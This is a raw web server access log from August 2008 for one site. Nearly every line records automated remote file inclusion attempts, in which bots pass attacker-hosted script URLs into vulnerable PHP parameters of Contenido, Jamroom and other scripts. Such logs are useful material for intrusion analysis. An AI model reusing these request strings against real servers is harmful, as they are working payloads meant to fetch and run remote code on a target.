83.102.137.163 - - [01/Aug/2008:03:27:32 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.symis.net"
83.102.137.163 - - [01/Aug/2008:03:27:32 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.symis.net"
83.102.137.163 - - [01/Aug/2008:03:27:33 -0700] "GET //?path%5Bdocroot%5D=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 647 "-" "libwww-perl/5.808" "www.symis.net"
83.102.137.163 - - [01/Aug/2008:03:27:33 -0700] "GET //?path%5Bdocroot%5D=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 647 "-" "libwww-perl/5.808" "www.symis.net"
83.102.137.163 - - [01/Aug/2008:03:27:33 -0700] "GET //?path%5Bdocroot%5D=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 647 "-" "libwww-perl/5.808" "www.symis.net"
83.102.137.163 - - [01/Aug/2008:03:27:33 -0700] "GET //?path%5Bdocroot%5D=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 647 "-" "libwww-perl/5.808" "www.symis.net"
83.102.137.163 - - [01/Aug/2008:03:27:33 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.808" "www.symis.net"
83.102.137.163 - - [01/Aug/2008:03:27:33 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.808" "www.symis.net"
83.102.137.163 - - [01/Aug/2008:03:27:33 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.808" "www.symis.net"
83.102.137.163 - - [01/Aug/2008:03:27:33 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.808" "www.symis.net"
213.33.84.163 - - [01/Aug/2008:03:28:21 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.theimageguide.com/uploads/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:29:20 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.kirchengemeinde-wachtberg.de/cms//contenido/includes/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:29:33 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.kirchengemeinde-wachtberg.de/cms//contenido/includes/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
87.230.35.101 - - [01/Aug/2008:03:30:09 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
87.230.35.101 - - [01/Aug/2008:03:30:24 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:30:57 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kirchengemeinde-wachtberg.de/cms//contenido/includes/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:30:57 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kirchengemeinde-wachtberg.de/cms//contenido/includes/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:30:57 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.kirchengemeinde-wachtberg.de/cms//contenido/includes/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:03:33:26 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:03:33:39 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:33:43 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:33:57 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
87.230.35.101 - - [01/Aug/2008:03:34:54 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
87.230.35.101 - - [01/Aug/2008:03:34:55 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
87.230.35.101 - - [01/Aug/2008:03:34:55 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:03:36:07 -0700] "GET //?path%5Bdocroot%5D=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 200 647 "-" "libwww-perl/5.811" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:03:37:23 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:03:37:23 -0700] "GET /logs//?path%5Bdocroot%5D=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.811" "www.symis.net"
80.67.24.32 - - [01/Aug/2008:03:38:27 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.sportsdorks.biz/bo.do.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.symis.net"
83.102.137.163 - - [01/Aug/2008:03:39:22 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.symis.net"
83.102.137.163 - - [01/Aug/2008:03:39:32 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.symis.net"
83.102.137.163 - - [01/Aug/2008:03:39:34 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.symis.net"
83.102.137.163 - - [01/Aug/2008:03:39:38 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.symis.net"
201.130.79.130 - - [01/Aug/2008:03:43:08 -0700] "GET /logs/access.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
201.130.79.130 - - [01/Aug/2008:03:43:08 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
201.130.79.130 - - [01/Aug/2008:03:43:08 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
201.130.79.130 - - [01/Aug/2008:03:43:53 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
80.67.24.32 - - [01/Aug/2008:03:45:22 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:03:52:55 -0700] "GET /logs/access.log//?path%5Bdocroot%5D=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:03:53:02 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:03:53:38 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
201.130.79.130 - - [01/Aug/2008:03:53:57 -0700] "GET /logs/access_080601.log/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
80.67.24.32 - - [01/Aug/2008:03:55:32 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.symis.net"
80.67.24.32 - - [01/Aug/2008:03:55:35 -0700] "GET //?path%5Bdocroot%5D=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 200 647 "-" "libwww-perl/5.808" "www.symis.net"
87.230.35.101 - - [01/Aug/2008:03:55:38 -0700] "GET /logs/access.log/errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
80.67.24.32 - - [01/Aug/2008:03:55:39 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.punto-5.eu/cms_daten/memei.jpg?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.808" "www.symis.net"
87.230.35.101 - - [01/Aug/2008:03:55:40 -0700] "GET /errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
87.230.35.101 - - [01/Aug/2008:03:55:40 -0700] "GET /logs/errors.php?error=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:03:58:52 -0700] "GET /logs/errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:03:58:52 -0700] "GET /errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:59:52 -0700] "GET /logs/access.log/errors.php?error=http://www.kirchengemeinde-wachtberg.de/cms//contenido/includes/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:59:52 -0700] "GET /errors.php?error=http://www.kirchengemeinde-wachtberg.de/cms//contenido/includes/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:03:59:53 -0700] "GET /logs/errors.php?error=http://www.kirchengemeinde-wachtberg.de/cms//contenido/includes/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:04:00:57 -0700] "GET //?path%5Bdocroot%5D=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 200 647 "-" "libwww-perl/5.811" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:04:02:05 -0700] "GET /logs/access.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kirchengemeinde-wachtberg.de/cms//contenido/includes/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:04:02:05 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kirchengemeinde-wachtberg.de/cms//contenido/includes/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
85.214.28.190 - - [01/Aug/2008:04:02:06 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.kirchengemeinde-wachtberg.de/cms//contenido/includes/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
201.130.79.130 - - [01/Aug/2008:04:03:20 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
201.130.79.130 - - [01/Aug/2008:04:03:20 -0700] "GET /logs/errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
201.130.79.130 - - [01/Aug/2008:04:03:20 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
201.130.79.130 - - [01/Aug/2008:04:03:20 -0700] "GET /errors.php?error=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:04:05:47 -0700] "GET /logs/access_080601.log/errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:04:05:47 -0700] "GET /errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:04:05:47 -0700] "GET /logs/errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
80.67.24.32 - - [01/Aug/2008:04:05:56 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.sportsdorks.biz/bo.do.jpg??? HTTP/1.1" 200 2373 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.symis.net"
65.55.232.16 - - [01/Aug/2008:04:06:01 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.symis.net"
65.55.232.16 - - [01/Aug/2008:04:06:01 -0700] "GET / HTTP/1.1" 200 647 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:04:09:19 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:04:09:31 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:04:09:32 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
80.67.24.32 - - [01/Aug/2008:04:10:16 -0700] "GET //webcom/show_article.php/_c-584/_nr-3/i.html//index.php?DOCUMENT_ROOT=http://www.sportsdorks.biz/bo.do.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.symis.net"
80.67.24.32 - - [01/Aug/2008:04:10:16 -0700] "GET /logs//webcom/show_article.php/_c-584/_nr-3/i.html//index.php?DOCUMENT_ROOT=http://www.sportsdorks.biz/bo.do.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:04:10:25 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:04:12:08 -0700] "GET /logs/access_080601.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:04:12:09 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:04:12:09 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:04:12:14 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:04:12:14 -0700] "GET /logs//?path%5Bdocroot%5D=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 200 2373 "-" "libwww-perl/5.811" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:04:13:59 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:04:13:59 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:04:13:59 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:04:14:49 -0700] "GET /logs/errors.php?error=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:04:14:49 -0700] "GET /errors.php?error=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:04:15:30 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.symis.net"
205.234.134.11 - - [01/Aug/2008:04:15:50 -0700] "GET /logs/access_080601.log/errors.php?error=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.symis.net"
205.234.134.11 - - [01/Aug/2008:04:15:50 -0700] "GET /errors.php?error=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.symis.net"
205.234.134.11 - - [01/Aug/2008:04:15:51 -0700] "GET /logs/errors.php?error=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.symis.net"
205.234.134.11 - - [01/Aug/2008:04:22:29 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.symis.net"
205.234.134.11 - - [01/Aug/2008:04:22:30 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.symis.net"
205.234.134.11 - - [01/Aug/2008:04:22:30 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.symis.net"
205.234.134.11 - - [01/Aug/2008:04:22:46 -0700] "GET /logs/access_080601.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.symis.net"
205.234.134.11 - - [01/Aug/2008:04:22:47 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.symis.net"
205.234.134.11 - - [01/Aug/2008:04:22:47 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:04:23:21 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:04:23:21 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.symis.net"
205.234.134.11 - - [01/Aug/2008:04:26:20 -0700] "GET /logs/errors.php?error=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.symis.net"
205.234.134.11 - - [01/Aug/2008:04:26:20 -0700] "GET /errors.php?error=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:04:28:08 -0700] "GET /logs/access_080601.log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:04:28:08 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.symis.net"
205.234.134.11 - - [01/Aug/2008:04:31:54 -0700] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.symis.net"
205.234.134.11 - - [01/Aug/2008:04:31:54 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.tierschutzverein-esslingen.de/contenido/cronjobs/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:04:31:57 -0700] "GET /logs/access_080601.log/errors.php?error=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:04:37:45 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.symis.net"
74.53.240.146 - - [01/Aug/2008:04:47:32 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.atventure.de/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
74.53.240.146 - - [01/Aug/2008:04:47:32 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.atventure.de/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
74.53.240.146 - - [01/Aug/2008:04:47:32 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.atventure.de/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:04:51:46 -0700] "GET /logs//errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
195.70.36.107 - - [01/Aug/2008:04:51:46 -0700] "GET //errors.php?error=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
222.116.93.138 - - [01/Aug/2008:04:51:51 -0700] "GET /logs/access_080701.log/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
222.116.93.138 - - [01/Aug/2008:04:51:51 -0700] "GET /errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
222.116.93.138 - - [01/Aug/2008:04:51:52 -0700] "GET /logs/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:04:55:11 -0700] "GET /logs//errors.php?error=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.symis.net"
66.199.244.42 - - [01/Aug/2008:04:55:12 -0700] "GET //errors.php?error=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.symis.net"
64.185.237.47 - - [01/Aug/2008:04:59:05 -0700] "GET /hioxupdate.php?hm=http://sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.symis.net"
64.185.237.47 - - [01/Aug/2008:04:59:05 -0700] "GET /logs/hioxupdate.php?hm=http://sonicsr.com/bo.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.symis.net"
222.116.93.138 - - [01/Aug/2008:05:01:30 -0700] "GET /logs/access_080701.log/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
222.116.93.138 - - [01/Aug/2008:05:01:31 -0700] "GET /errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
222.116.93.138 - - [01/Aug/2008:05:01:31 -0700] "GET /logs/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
